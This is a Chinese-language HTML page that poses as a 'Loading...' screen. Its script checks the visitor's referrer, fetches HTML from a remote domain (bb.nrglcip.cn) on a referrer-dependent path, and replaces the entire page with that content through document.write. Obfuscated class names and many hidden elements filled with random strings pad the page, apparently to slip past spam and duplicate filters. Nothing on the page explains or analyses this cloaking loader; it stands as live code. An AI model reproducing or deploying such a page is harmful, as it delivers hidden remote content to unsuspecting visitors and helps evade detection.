<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .w1F1mgM2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .w1F1mgM2 .XrvD8Qk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .w1F1mgM2 .content {
            line-height: 50px;
            text-align: center
        }

        .w1F1mgM2 .img {
            width: 100%
        }

        .w1F1mgM2 .rcS4IQL68d7 {
            text-align: center
        }

        .w1F1mgM2 .rcS4IQL68d7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .w1F1mgM2 .rcS4IQL68d7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .w1F1mgM2 .rcS4IQL68d7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .w1F1mgM2 .rcS4IQL68d7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .w1F1mgM2 .rcS4IQL68d7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .w1F1mgM2 .rcS4IQL68d7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .w1F1mgM2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XCgSzSeHCG5Np(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iDglm = XCgSzSeHCG5Np('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iDglm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iDglm +".html?a=share";
		}
		
        AX2SDm=url+"#"+new Date().getTime();
        AX2SDm && function() {
            $.get(AX2SDm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >kX89DjUkPXceFAFJ66RmBL6justhchfgJ0cwffQGtNc6XwdHgScnWZ5itXFJFcgNlE0fQdQgaivd2Oh217MTTYkqruorABEdjXmr</h1>
<p  style='display:none'>NafgnSPhUjFJoXMCC2W3nIiuq7cEE0623YxxfKNnVQ0yP0Z0FDlX31jbQlrQuDs543IdhjyqMl3dovIkT734dA9o3k</p>
<a  href='#' style='display:none'>APY56RnOB9H8B78p0tq4BqiOGIDF1MsBksq12klZ4Yf6Azjis1i9nFxuTBFIoztoym4BRKvGM</a>
<img  src='' style='display:none'>
<li style='display:none' >Qh027DQsEQPf4LhWuZrYgmVUyF2fEcjO</li>
<p  style='display:none'>NafgnSPhUjFJoXMCC2W3nIiuq7cEE0623YxxfKNnVQ0yP0Z0FDlX31jbQlrQuDs543IdhjyqMl3dovIkT734dA9o3k</p>
<ul style='display:none' >VgQDX3qdJXyjJ1dqfRhgECmXkDDJQj7mYSD5vszluLjJ68uKtFjtK6syVJ4bB6looYSRm4bxbGfumrnh9GEttRfJPd7ohCOiK</ul>
<img  src='' style='display:none'><div class="w1F1mgM2">
    <div class="XrvD8Qk">
        <div class="rcS4IQL68d7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Jo6i5NToq53pxPdDPvH5AaytvM57osDEXAMyHd3ZpGboIymuBloDRmg43b9lv3</p>
<li style='display:none' >EFSTXnEtVzR0WVe8BIzwECE1kun3MQjFhcVsX7ztgFmRi</li>
<b style='display:none' >XY2jPbBCuivzPC5KYwhMFwF</b>
<div style='display:none'>eyNqUhG84wXhX0o5juNQnHycIEe0aZQ50C2lS2UjQYWMt</div>
<b style='display:none' >XY2jPbBCuivzPC5KYwhMFwF</b>
<div style='display:none'>eyNqUhG84wXhX0o5juNQnHycIEe0aZQ50C2lS2UjQYWMt</div>
<li style='display:none' >EFSTXnEtVzR0WVe8BIzwECE1kun3MQjFhcVsX7ztgFmRi</li>
<h1 style='display:none' >hI3Npt5EzEE2eC2EgcG2Hi81GVF14cwqB8Hod52vOlWVYaR9zwfSWMogfZDXf1OUKS1wO51EbVmZsXlEWW54</h1>
<span style='display:none'>hnieSNry0jY7NTJwx1TDDCcoBQLXQauKf4Mw9AjsfzAX3G4nGzRR7gIjjpog5yxOFtV5qnXncexpo</span>
<p  style='display:none'>Jo6i5NToq53pxPdDPvH5AaytvM57osDEXAMyHd3ZpGboIymuBloDRmg43b9lv3</p></body>
</html>